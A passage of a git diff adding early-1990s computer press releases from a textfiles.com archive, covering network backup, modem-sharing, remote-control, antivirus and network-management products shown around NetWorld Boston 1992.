technical +support via its own bulletin board system (BBS), Novell's NetWire forums, +and through ongoing distributor and reseller training. + +Thomas-Conrad Corp +1908-R Kramer Lane, Austin, TX 78758 +512-836-1935 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/techsint.txt b/textfiles.com/computers/PRESSRELEASE/techsint.txt new file mode 100644 index 00000000..113663bd --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/techsint.txt @@ -0,0 +1,51 @@ +NETWORLD, Boston, February 11-- Ziff Communications today announced that it +has acquired TECHS, International, of Anaheim, California, publisher of +the Technical Encyclopedia of Computer Hardware and Software, the only +multivendor database of technical support information for computer +hardware and software. + +Ziff plans a future release of the TECHS product as part of its Computer +Library CD-ROM product line, according to Seth Alpert, vice president and +general manager of the Computer Library Group. "The TECHS acquisition is +strategic for us," said Alpert, "because it enables us to enter the +critical area of technical support with a definitive CD-ROM product in the +near future." + +The current TECHS product is available on CD-ROM and contains technical +information from over 60 hardware and software vendors including Novell, +3Com, Banyan, AST Research, Cabletron, SynOptics, Madge, and Standard +Microsystems Corp. (SMC). It is especially useful for supporting network +products and offers cross-referenced information about error messages, +hardware and software compatibility, and installation and configuration of +hardware. It has received a number of awards including Product of the Year +from LAN Magazine in 1988. + +TECHS is used by end-user organizations, major computer product +manufacturers, distributors, and resellers in the U.S. and over 20 +countries throughout the world. + +TECHS founder Jeff Schwartz welcomes the Ziff acquisition, and will +continue on as Computer Library's director of LAN support products. "This +acquisition means we now have the resources available to substantially +improve the scope and quality of the product," says Schwartz. "We remain +committed to offering the most comprehensive and accessible technical +support information available anywhere." + +For product support or ordering information, TECHS customers should +continue to call TECHS International at (714) 777-7700. + +A division of Ziff Communications Company, Computer Library develops, +markets and supports comprehensive, CD-ROM databases of computer +information that help businesses evaluate, buy, use and manage personal +computers and networking products. + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/tecmar.txt b/textfiles.com/computers/PRESSRELEASE/tecmar.txt new file mode 100644 index 00000000..99173bec --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/tecmar.txt @@ -0,0 +1,102 @@ +BOSTON, February 11-13, 1992--To more fully automate unattended backup, +Tecmar introduces ProServe' 4.0, the latest version of its award winning +server-based backup and restore software for Novell NetWare. Supporting +Tecmar's complete ProLine family of backup subsystems, ProServe 4.0 now +fully automates all data-management activities and offers advanced +disaster recovery features. The new software will be demonstrated at +NetWorld Boston in booth #4301. + +ProServe 4.0 offers a new Auto Pilot Tape Management enhancement which +works as an invisible network administrator with features including: Tape +Rotation to maintain daily, weekly, monthly and yearly tapes with complete +system backup history; Disk Grooming to remove unaccessed disk files after +a user-specified time period and automatically generate permanent storage +copies; and for automated disaster recovery, Quick Recover to rebuild part +or all of a network's data back to any point in time by reading a stored +database from a backup tape. ProServe 4.0 also fully automates tape +creation and labeling, tape library management, and supports hierarchical +data storage. + +"These new enhancements are in direct response to the needs of large +network sites which demand powerful automation and reliable controls," +said Gene Della Torre, vice president of marketing. "We're giving our +users just what they've asked for, along with improved automation which +will save them considerable headaches, time and money." + +Specifications And Compatibility + +ProServe 4.0 is available as both an NLM for NetWare 3.11 networks and as a +VAR for NetWare 2.2. ProServe 4.0 is compatible with Tecmar's complete +line of ProLine backup systems, including its quarter-inch tape systems +ranging from 250MB to 1GB, its DATaVault' 2GB DAT drive, its 8mm 2.2GB +tape drive, and its LaserVault rewritable optical disk drive. + +Price And Availability + +The new ProServe 4.0 is available now with Tecmar's ProLine products. The +suggested retail price for the ProServe 4.0 NLM is $1,695. The suggested +retail price for the ProServe 4.0 VAP is $1,195. Upgrade pricing for the +ProServe 4.0 VAP or the ProServe 4.0 NLM ranges from $125 to $700 +depending on the version required. Contact Tecmar for details. + +For More Information + +Tecmar, founded in 1974, is a pioneer and international leader in +manufacturing enhancement products for personal computers. Tecmar is a +subsidiary of Rexon, Inc., whose common stock is traded on the NASDAQ +system, ticker symbol REXN. Tecmar markets its IBM2 and Apple products +through a worldwide network of dealers, distributors and VARs. + +-------------------------------------------------------- + +BOSTON, February 11-13, 1992--Tecmar announces significant upgrade +discounts for its new ProServe version 4.0 automated backup software for +Novell NetWare users. The promotional pricing begins at NetWorld Boston +and is effective through March 31 for any United States customer. + +For users upgrading from a ProServe 3.0 VAP' or NLM to a ProServe 4.0 VAP +or NLM, Tecmar's discount price is $75 rather than the standard $125. For +users upgrading from a ProServe 3.0 VAP to a ProServe 4.0 NLM, the price +has been discounted from $700 to $425. + +Free upgrades are also available to anyone who has purchased a ProLine +drive or ProServe software within the last 90 days, with proof of +purchase. + +Tecmar's new ProServe 4.0 is being introduced during NetWorld Boston. The +advanced automated backup software supports Tecmar's wide range of +1/4-inch tape, digital audio tape (DAT), 8mm helical scan and rewritable +optical backup systems. + +-------------------------------------------------------- + +BOSTON, February 11-13,1992--Tecmar announces free upgrades and shipping +for its latest QTOS' version 1.4 to registered QTOS users during NetWorld +Boston. The free upgrades are available to any QTOS user with the +completion of a simple survey at Tecmar's booth #4301. + +For those registered users not attending NetWorld Boston, the new QTOS 1.4 +is available, free from the Tecmar Bulletin Board System at (216) +349-0853, and for $25 through Tecmar's toll-free number, (800) 624-8560 +through March 31. Sold separately, the new QTOS 1.4 is regularly priced at +$149. + +The new QTOS version 1.4 supports Tecmar's complete range of 1/4-inch, +digital audio tape (DAT), 8mm helical scan and rewritable optical backup +systems. + +-------------------------------------------------------- + +Tecmar, 6225 Cochran Rd, Solon, OH 44139-3377 +216-349-0600; 800-624-8560 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/telebit.txt b/textfiles.com/computers/PRESSRELEASE/telebit.txt new file mode 100644 index 00000000..cfccce26 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/telebit.txt @@ -0,0 +1,59 @@ +SUNNYVALE, Calif.--January 27,1992--Telebit Corporation (NASDAQ: trading +symbol TBIT), a pioneer of high-speed modems, dial-up networking, and +wide-area communications products, introduced today the ModemMizer, +Telebit's newest member of the ACS (asynchronous communication server) +product family that functions as a non-dedicated communications server +solution for Novell Netware and NetBIOS networks. + +ModemMizer is a modem-sharing software solution that operates on any +existing PC workstation and supports up to two modems with port speeds up +to 38,400bps. Providing both dial-in and dial-out functionality, the +ModemMizer utilizes dynamic allocation of ports to effectively manage LAN +modem resources. This insures that no modems or telephone lines are +inaccessible unless they are actually being used. Since the ModemMizer +operates in the background of any PC, local and remote users can access +other applications such as electronic mail and file transfer as well as +dial-out service providers without interrupting the host PCs activity on +the network. + +ModemMizer also offers comprehensive network management features including +activity reporting, built-in breakout box, data trace, and remote console +capabilities that are typically offered only in dedicated communications +servers. All of these features can be accessed from any local or remote PC +on the network. + +"ModemMizer is the ideal modem-sharing solution for small PC LANs that want +to maximize the performance of high-speed modems and reduce hardware and +phone line costs at the same time," said Michael Ballard, President and +CEO. + +The Telebit ModemMizer software package is available immediately for a list +price of $349 and includes a standard 90 day warranty. + +Included with ModemMizer is a two concurrent user license for pcANYWARE +IV/LAN version 4.5 software and two copies of pcANYWARE IV/Remote +providing terminal emulation, remote control and support for remote +Windows. Additionally, ModemMizer operates with other third-party +communications packages that support either the Telebit APL Interrupt 14 +or NASI workstation interfaces. + +Telebit Corporation designs, manufactures and markets advanced highspeed +products for dial-up networking and wide-area communications. The +company's digital signal processing technologies provide extremely +reliable error-free communications across the global switched telephone +network. Telebit markets its products worldwide through distributors, +original equipment manufacturers and value-added resellers. + +Telebit Corp, 1315 Chesapeake Terrace, Sunnyvale, CA 94089 +408-734-4333 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/triton.txt b/textfiles.com/computers/PRESSRELEASE/triton.txt new file mode 100644 index 00000000..9e8b56ab --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/triton.txt @@ -0,0 +1,136 @@ +Iselin, NJ, February 11, 1992 - Triton Technologies announces the release +of CO/Session 6.02 with faster EGA/VGA graphics and improved remote +Windows performance. + +Shipping March 1, CO/Session 6.02 provides substantial performance +improvements based upon further refinements in Triton's proprietary +graphic data compression and video scanning techniques. "Triton's latest +release of CO/Session offers substantial remote graphic improvements. +Remote VGA graphics are two to five times faster when using popular DOS +graphic programs such as Lotus 1-2-3, Quattro Pro or Harvard Graphics. +Remote Windows performance has also been vastly improved by 20% or more," +explained Jim Mulholland, Triton's Director of Marketing. + +For example, utilizing a 9600 baud modem, some VGA images that previously +required 30 seconds or longer to be drawn remotely are now displayed in +less than 7 seconds with CO/Session 6.02. + +CO/Session 6.02 is a remote-control communications software product +allowing a PC in one location to remotely operate a second PC in a distant +location via modems or communication ports. The PCs involved can be either +standalone PCs or PCs on a network. CO/Session supports the remote +execution of both DOS and Window application programs. + +CO/Session 6.02 requires the remote or host PC to have MS-DOS 2.0 or later, +360k of disk storage and 256K of memory. + +The suggested list price of CO/Session 6.02. is $195 for a Two PC Package. +Additional Host packages will be available for $125 and additional Remote +packages will be available for $135. + +An upgrade path is available for users of CO/Session, Carbon Copy, +Close-Up, Remote2 and pcAnywhere. Current CO/Session 4.0 or 5.0 users can +upgrade to CO/Session 6.02 for only $25. Users of CO/Session 6.0 can +upgrade for $10 and users of CO/Session 6.01 can upgrade for free via +Triton's BBS. Users of Carbon Copy, Close-Up, Remote2 and pcAnywhere can +also upgrade any version to a CO/Session Two PC Package for just $50. + +CO/Session 6.02 will be available from distributors and dealers worldwide. +Interested individuals can contact Triton at (908) 855-9440. + +The previous release of CO/Session, version 6.0, recently won LAN +Magazine's 1992 Communication Software Product of the Year Award, as well +as PC Magazine Editor's Choice. The improved features of CO/Session 6.02 +will be demonstrated at Triton Technologies' booth at Networld Boston. +Triton's booth number is #1933. + +Triton Technologies Inc. is a leading U.S. and international supplier of +remote access, file transfer and modem sharing communication packages for +IBM compatible PCs and networks. The company was founded April 1985 and +offers a range of products for PC, LAN and X.25 communications including +CO/Session LAN II, Session/XL, CO/Session ACS and CO/Session X.25. + +-------------------------------------------------------- + +Iselin, NJ, January 10, 1992 - Triton Technologies announces the shipping +of CO/Session LAN II for Novell networks. Providing users on a Novell +network with the ability to remotely control another workstation, +CO/Session LAN II further allows network users to access any modem +connected to an Asynchronous Communication Server. Priced at $195 per file +server, CO/Session LAN II began shipping to the general public on December +16, 1991. + +As part of Triton's release of CO/Session LAN II, full support for Windows +3.0 is included. Users on a Novell network will be able to access other +workstations on the network and remotely run Windows, Windows applications +and DOS applications from their remote workstation with full graphics, +keyboard and remote mouse support. Real, standard and enhanced modes of +Windows will be supported. + +"Our customers and dealers have asked us to provide them a LAN version of +CO/Session for controlling PCs and modems across the network. CO/Session +LAN II does that with Windows and ACS support and at a great price," +states Jim Mulholland, Triton's Director of Marketing. + +Offering the ability to access modems connected to an ACS, CO/Session LAN +II is ideal for use with high speed modems to access remote PCs and +networks. With TTY, VT100 or VT102 terminal emulation modes and XMODEM +file transfer protocol, CO/Session LAN II also provides network users with +general purpose communications. + +"Originally developed to be compatible with asynchronous communication +servers, Co/Session LAN II has grown into a full fledged network aware +communication program, able to control other workstations on the network +and access modems connected to an ACS for remote control, terminal +emulation or file transfers," explained Jim Mulholland. "It provides +network administrators with one package to handle many needs with one +common user interface and terrific value." + +CO/Session LAN II is compatible with asynchronous communication servers +(ACS) that support a NASI/NCSI or Interrupt 14 interface. Communication +servers supported include Triton's CO/Session ACS, Novell's NACS, +Telebit's PACS, J & L Information System's NCS, Network Products' ACS2, +Cross Information's LAN+Modem and Fresh Technologies' Modem Assist. +CO/Session LAN II is licensed for use with up to four modems +simultaneously with a single ACS. + +Support of Banyan's Intelligent Communication Adapters (ICA) is also +included with CO/Session LAN II. This provides Banyan users with a +powerful capability for control of remote LANs and PCs. No other remote +control package currently is compatible with Banyan's ICA. + +The suggested list price of CO/Session LAN II is $195 per file server with +unlimited users for LAN-to-LAN remote control and for a single +communication server with up to four communication devices (modems). +Upgrades to users who purchased CO/Session LAN are $75. Users of competing +LAN remote control products such as pcAnywhere IV LAN, Close-Up LAN, LAN +Assist and NETremote Plus can also upgrade for just $75 per file server. + +"CO/Session LAN II is the only LAN remote control product to retail for +less than $200 for a file server. Competing products retail for $295 - +$795 and many are licensed by number of workstations on the LAN creating a +real headache for Administrators to maintain proper licensing", states Jim +Mulholland. + +CO/Session LAN II is available from distributors and dealers Interested +individuals can contact Triton at (908) + +Triton Technologies Inc. is a leading U.S. and international supplier of +remote access and file transfer communication packages for IBM compatible +PCs and networks. The company was founded April 1985 and offers a range of +products for PC, LAN and X.25 communications including Session/XL, +CO/Session LAN II, CO/Session ACS and CO/Session X.25. + +Triton, 200 Middlesex Turnpike, Iselin, NJ 08830 +800-322-9440; 908-855-9440 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/untouch.txt b/textfiles.com/computers/PRESSRELEASE/untouch.txt new file mode 100644 index 00000000..77a94b5e --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/untouch.txt @@ -0,0 +1,142 @@ +BATON ROUGE, La., Nov. 18, 1991 -- Fifth Generation Systems, Inc., today +introduced Untouchable, a new line of anti-virus software that provides +complete virus protection without the need for frequent virus signature +updates. Untouchable stand-alone and network products are designed to +operate on DOS-based PCs, compatibles and networks. + +Four features distinguish the Untouchable product line from other +anti-virus software products on the market: + +o a revolutionary product design which eliminates the need + for frequent virus signature updates; + +o a patented virus removal technique that guarantees + 100 percent restoration of recoverable infected files, + including those hit by unknown viruses; + +o automatic, load-and-forget protection that ensures the + integrity of data without interfering with the work + process; and + +o a network version that provides centralized installation + and management capabilities. + +"Untouchable sets the standard for the next generation of anti-virus +software," said Barry L. Bellue, Sr., president and CEO of Fifth +Generation Systems. "This is the virus protection software that corporate +America has been waiting for," he continued. "It is nearly impossible to +get 40,000 users at a large corporation to update their software every +three months. With Untouchable, they will have total protection against +all existing and future viruses, even if they never buy virus signature +updates." + +PRODUCT DESIGN + +Untouchable consists of three distinct anti-virus technologies that +constantly interact to detect and eradicate known and unknown viruses. + +The heart of Untouchable's detection capabilities is the file scanner, +which incorporates the principal of modification detection. This +mathematically-proven technique safeguards against known and unknown virus +threats by making unique use of file signatures rather than the +commonly-used virus signatures. + +During installation, Untouchable fingerprints and registers all files on +the PC, using proprietary file signature calculations, and stores the +information in encrypted on-line and off-line databases. Every day, +Untouchable automatically performs an integrity test of the user's files +and compares the results of this check to the information initially stored +in the database. + +If a virus is detected, Untouchable uses the database of file signatures as +a reference to reconstruct infected files to their former. "healthy" +state. Since the removal methodology does not rely on virus signatures, +Untouchable can safely restore files struck by an unknown virus. + +"No other product available today can offer this degree of protection or +guarantee 100 percent safe restoration of recoverable files," said +Bellue. + +As a first line of defense, Untouchable uses a TSR monitor that checks +system memory for known boot sector and partition table viruses. Once +loaded into memory, it is always on guard against known viruses, scanning +each file before execution and checking every diskette inserted into the +floppy drive. Running completely in the background, the TSR monitor +occupies less than 900 bytes (.9K) when loaded into expanded memory or 5K +if fully loaded in conventional memory. + +Untouchable's second line of defense is a virus scanner/remover that can +detect and eradicate hundreds of known viruses. The virus scanner is +automatically run during program installation to verify a clean +environment and is automatically launched to check all new files and +programs for viruses before they are added to the database of file +signatures. The scanner can be manually run from the command line to check +floppy disks before use. If the scanner detects a known virus, it will +restore recoverable files to their original state. + +UNTOUCHABLE NETWORK + +Untouchable Network provides Novell LAN administrators with the ability to +centrally monitor and control the entire network for viruses. + +The program uses the same methods of protection as the stand-alone version, +but incorporates enhanced LAN management features, including: + +o automatic installation and updating from one location; + +o transparent, unobtrusive operation at the workstation + +o ultimate control over the way the program operates + on every node; + +o real-time virus alert mechanisms; + +o ongoing status reports on the state of the network + from one central control panel; + +o historical logs of all status reports and virus + alerts; and + +o the ability to assign "system operators" who receive + the same alert that workstations receive. + +Untouchable Network currently provides its enhanced LAN management +facilities for the Novell Netware operating system. A network saw y +version of the product, without the LAN management features, is available +to run on Microsoft LAN Manager, Banyan Vines, 3Com and other PC network +operating systems. Bellue said, "We will expand Untouchable Network's LAN +management capabilities to other network operating systems." + +Untouchable will be available in mid-November at a suggested retail price +of $165. An Untouchable Network Starter Kit is available at a suggested +retail price of $695. The starter kit includes the server package of full +supervisor documentation and software and ten node license agreements. +License agreements for additional nodes may be purchased at a suggested +retail price of $85 per node. + +While Untouchable does not require virus signature updates to ensure +complete protection against undiscovered new viruses, Fifth Generation +Systems recognizes that some users may want them. The company will provide +quarterly virus signature updates for the virus scanner and TSR monitor, +for a service charge of $15 per quarter. + +Fifth Generation Systems is one of the leading developers of DOS and +macintosh utilities software for data security, with Untouchable for virus +protection, DiskLock for access security and encryption, and FastBack Plus +for data backup. The privately-held firm also develops software for +menuing/file management and recovery. + +Fifth Generation Systems Inc +10049 North Reiger Rd, Baton Rouge, LA 70809 +504-291-7221 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/virusafe.txt b/textfiles.com/computers/PRESSRELEASE/virusafe.txt new file mode 100644 index 00000000..a014ffec --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/virusafe.txt @@ -0,0 +1,191 @@ +Boston, MA -- February 11, 1992 -- At NetWorld 92 Boston, XTree Company +(Booth #430) will expand its product line to include the most +comprehensive network virus detection, prevention, and elimination utility +ever -- ViruSafe/LAN. ViruSafe/LAN sets the standard for protection +against known and unknown viruses and, unlike other programs, can even +learn from unknown viruses to modify and enhance its defenses. + +ViruSafe/LAN has been created to work on all networks, including Novell +LANs. The $595 utility comes with a license for ten users. New network +specific features include: automatic Supervisor notification of a virus +attack on a workstation and unsurpassed flexibility in installation and +configurability. + +ViruSafe, licensed by XTree Company for distribution in North and South +America, Australia and New Zealand, was created in Israel by EliaShim +Microcomputers in 1987 to combat Jerusalem B (the first virus to attack +microcomputers). + +After years of use and hundreds of thousands of worldwide installations +(with clients ranging from the Israeli Defense Ministry to Hewlett Packard +and NASA) ViruSafe has emerged as a Fortune 1000 and government standard +in comprehensive virus detection, prevention, and elimination according to +Moti Dover, President, EliaShim Microcomputers, Inc. + +ViruSafe/LAN, now in its fourth major release, has earned the reputation +for being the most complete virus protection product available. ViruSafe +is a "user friently product that can be used by everyone in your +organization, it found more viruses than any other product tested," says +Bob Cartwright, of Chevron Information Technology. "It is the most +comprehensive packaged I reviewed." + +"ViruSafe/LAN is active, not reactive," explains King Lee, XTree Company +CEO. "ViruSafe's technology does not rely simply on known virus signatures +-- it knows how to detect activity prior to infection... as well as +after." Lee adds, "ViruSafe is time-tested and the only total solution for +protection against infection from known and unknown viruses on the market +today." + +ViruSafe/LAN - The Complete Virus Terminator + +ViruSafe/LAN monitors, detects and removes viruses in memory, file +allocation tables (FATs), boot sectors, partition tables, and root +directories as well as in executable files (or in all files). The network +utility works on both Net BIOS LAN and NetWare. + +ViruSafe/LAN is designed to give the network administrator unsurpassed +flexibility in installation and configurability. For example, ViruSafe/LAN +will display all the users on the network. From there the supervisor can +select individual users and uniquely configure ViruSafe/LAN for their +system. + +When the user logs on, ViruSafe/LAN will automatically configure and copy +the appropriate ViruSafe/LAN modules to the local workstation and update +the AUTOEXEC.BAT file (if desired). This unique time-saving feature allows +supervisors on all types of networks to individually configure and +maintain hundreds of users from one location. + +This module will also automatically collect and combine virus-checking +reports from each work station and send it back to the server where the +supervisor can monitor virus-checking activity. + +ViruSafe/LAN contains six modules -- Anti-Virus Resident Monitor, Memory +Virus Check, Scan and Remove, Program Integrity Check, Disaster Protection +and Recovery, and PC-Checkup System Information. All of the ViruSafe/LAN +modules are self-immunized against virus infection. If they are attacked +by a virus, the programs can dynamically reconstruct themselves without +forcing the user to reinstall. All modules are available in the easy menu +interface or at the command line. ViruSafe/LAN allows the supervisor to +define when ViruSafe/LAN should be active -- continuously, when scheduled, +or only run manually -- as well as which portions of the system should be +checked. + +** ViruSafe Monitor (VS.EXE) is a totally-configurable, real-time +Anti-Virus Filter TSR module (transparent to the user) which provides +continuous monitoring. (TSR uses only 12K -- 9K without help screens -- +half the size of competitive products. And it will load high, occupying as +little as OK on a 286 or 386 system.) If selected, VS will: + +ù Prevent unauthorized access to critical areas like Boot Sectors, Program +Files and Memory. + +ù Prevent viruses from entering memory before they have a chance to +replicate. + +ù Prevent any writes to your hard disk the first time a new program is +executed. + +ù Automatically check floppy diskettes for viruses the first time they are +read. + +ù Check for changes in memory sizes or interrupt values that would indicate +a virus is present. + +ù Provides a virus-free copy function that checks any files to be copied +for viruses. + +** Virus Check (VC.EXE) checks memory for any viruses and can be run from a +batch file to give protection each time the computer is turned on. Virus +Check can detect and neutralize known and unknown viruses trying to infect +programs. + +Once it has determined the activity pattern and identifying signature of +the virus, Virus Check can provide that information to the other modules +so that they can update their own defenses. For the first time, new virus +types can be identified and stopped instantly without having to receive a +software update from the publisher. + +** UNVIRUS scans and removes viruses from all files and boot sectors. This +is useful for users who may already have a virus and want to remove it +from their system. In most cases, ViruSafe/LAN can safely remove a virus +from files and leave the original file intact. + +** Program Integrity Check (PIC.EXE) registers signatures of user selected +files (or all files) and boot sectors and identifies unauthorized changes +to them -- guarding against known and unknown viruses. PIC can reconstruct +the boot sector and partition table if a change is detected, completely +neutralizing viruses. + +More Than a Virus Terminator + +ViruSafe/LAN goes beyond being amazingly powerful by providing: + +ù Easy Installation -- Easy Interface. Simple user interface + includes mouse support and point-and-shoot menus. +ù Creation of a "safe" floppy diskette to restore PC to + health -- if needed. +ù Password protection to prevent tampering with the ViruSafe + system. +ù Viewers to see memory or contents of boot track + (to scan for virus messages). +ù Comprehensive list of viruses and mutations with + descriptions of symptoms. (New virus signatures may easily + be added to the program.) + +Pricing, Availability. Requirements + +The introduction of ViruSafeLAN is accompanied by new customer service +programs at XTree Company. New virus information and updates to the +ViruSafe/LAN database can be downloaded from the company's bulletin board +service (BBS). These updates provide additional virus identification and +removal instructions for ViruSafe/LAN. In addition, a CompuServe forum +will be available soon, as well as a fax service that allows users to call +for the latest product and virus information. An update service will allow +ViruSafe/LAN customers to receive quarterly updates of new virus +signatures. All registered users will receive their first update at no +charge. + +ViruSafe/LAN retails for $595 and includes a license for ten users. XTree +Company also offers corporate volume purchase agreements and site +licenses. + +ViruSafe/LAN is also available through the vendor's distributor network, +which includes Ingram Micro, Kenfil, Merisel, Software Resource, and XTree +Authorized Resellers, which include CompUSA, Egghead, Software City, +Software Etc., and other nationwide chains. + +Other Products + +XTree Company also publishes XTreeGold 2.5 and XTree Easy, the industry +standards in disk management software for the IBM PC, XT, AT, PS/2 and +compatible computers; XTreeNet, the leading file and disk manager for +Novell network administrators; and the just-released Xtree for UNIX +systems, the leading file and disk manager for multi-user Intel-based UNIX +applications. + +Project Green + +In 1990, XTree Company launched "Project Green" and became the first major +publisher to produce software products using recycled and/or +environmentally sensitive materials. + +ViruSafe/LAN continues the "everything except the floppy disk and the +shrink-wrap can be recycled" practice. (The company is currently looking +for alternatives to shrink-wrapping their products.) Further, for every +ViruSafe/LAN user registration card returned, XTree Company will plant a +tree in conjunction with the American Forestry Association's Global ReLeaf +program. + +Xtree Company, 4330 Santa Fe Rd, San Luis Obispo, CA 93401 +805-541-0604 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/visisoft.txt b/textfiles.com/computers/PRESSRELEASE/visisoft.txt new file mode 100644 index 00000000..4046049e --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/visisoft.txt @@ -0,0 +1,162 @@ +Atlanta, GA (February 3, 1992)- VisiSoft's new systems architecture for its +Windows-based VisiNet Network Management System will be shown for the +first time at NetWorld Boston. The new architecture includes the +Enterprise System Platform and special Function Modules that tailor the +system to a wide range of network operating systems, protocols, devices, +enterprise managers and management functions. + +"It's clear that better network management is critical to the continued +expansion of the use of LANs and WANs," said Rich Mauro, VisiSoft's vice +president, marketing. "The requirements, however, vary considerably from +company to company. A single LAN user's management needs are quite +different from those of the heterogenous, multi-site, wide area network +user. Many of these single site networks will, of course, grow in +complexity over time. + +The primary design goal of VisiNet's new architecture was to allow users to +tailor a VisiNet system to their initial requirements and expand it as +they grow." + +Under the new VisiNet architecture, users may purchase the basic Enterprise +System Platform with a single module supporting one specific environment. +NetWare, LAN Manager/LAN Server, NetBIOS and SNMP Function Modules will +all be available when the new platform ships. The Function Modules will +provide the same user interface and function as the current versions of +VisiNet that support these network operating systems and protocols. A +Banyan VINES Module will also be available later in the year; Banyan +users, however, may take immediate advantage of VisiNet's management +capabilities by using the SNMP Module. VisiSoft is also working with +Novell to interface VisiNet's Netware Module to Novell's recently +announced network management platform. + +Companies whose heterogenous, wide-area networks employing multiple network +operating systems and protocols can purchase VisiNet's Enterprise System +Platform with multiple Function Modules to serve their specific needs. +Administration of the entire network environment may then be done from a +single network console. + +"VisiNet's new structure will minimize the impact of network expansion on +network management," said Chip Standifer, VisiSoft's president. "The +modular approach will not only let users expand VisiNet as their network +expands, but do it painlessly. They won't have to buy a new system or +upgrade to a new version...they'll just add the necessary module to +VisiNet's Enterprise System Platform". + +Later this year, VisiSoft will introduce additional Function Modules that +will allow VisiNet to operate as a hierarchical network management system. +VisiNet consoles equipped with a Communicating Module in remote sites will +send real-time management information to a central site equipped with a +VisiNet Collecting Module. Users will have a choice of managing the remote +sites solely from the central console or sharing the management duties +between the remote and central site. + +Future VisiNet Function Modules will expand its interface to other vendors' +enterprise management systems, such as NetView, and to proprietary device +information. Device support will be developed in joint development efforts +with these vendors or by the vendors themselves. VisiSoft will make +information on the VisiNet interface available to interested vendors to +facilitate the expansion process. + +"Our goal," said Standifer, "is to evolve VisiNet to the point where it not +only detects problems, but resolves many common network problems. +Effective network management requires both monitoring and control. We want +VisiNet to help the network administrator understand the options and +select the best course of action. We expect to make those expanded +functions available as additional modules that companies can add to their +systems." + +VisiSoft distributes VisiNet through a worldwide network of value-added +resellers, system integrators and distributors. Inquiries are welcome, and +should be directed to VisiSoft, 430 10th St., NW, Suite S-008, Atlanta, GA +30318, phone 404-874-0428, fax 404-8746412. + +-------------------------------------------------------- + +Atlanta, GA (February 3, 1992)- The Simple Network Management Protocol +(SNMP) version of VisiNet, the Windows-based active network management +system developed by the VisiSoft division of Technology Dynamics, began +shipping today. "VisiNet's SNMP version," said Chip Standifer, VisiSoft's +president, "lets network administrators manage systems and devices that +include an SNMP agent. It supports MIB I and MIB II, and can be +user-expanded to support experimental and enterprise-specific MIBs. It +communicates with the network using NetManage's TCP/IP kernel, which is +included in the VisiNet SNMP package." + +VisiNet's user-extendable capability allows it to access any information +provided by a system's or device's SNMP agent. VisiSoft plans to augment +this basic user definability with pre-configured MIBs beyond MIB I and MIB +II. These will support the RMON MIB and other popular system or device +MIBs. + +Currently operating under Windows 3.0, VisiNet will operate under Windows +3.1 and OS/2 2.0 when these environments become available. VisiNet's SNMP +version has a suggested list price of $2495. The LAN Manager/LAN Server +and NetWare versions, which are currently available, are priced at $1995. +VisiSoft distributes VisiNet through a worldwide network of value-added +resellers, system integrators and distributors. + +-------------------------------------------------------- + +Atlanta, GA (February 3, 1992)- VisiNet 2.0, developed by the VisiSoft +division of Technology Dynamics, promises to revolutionize PC-based +network management with its graphic presentation and control of network +information. Currently 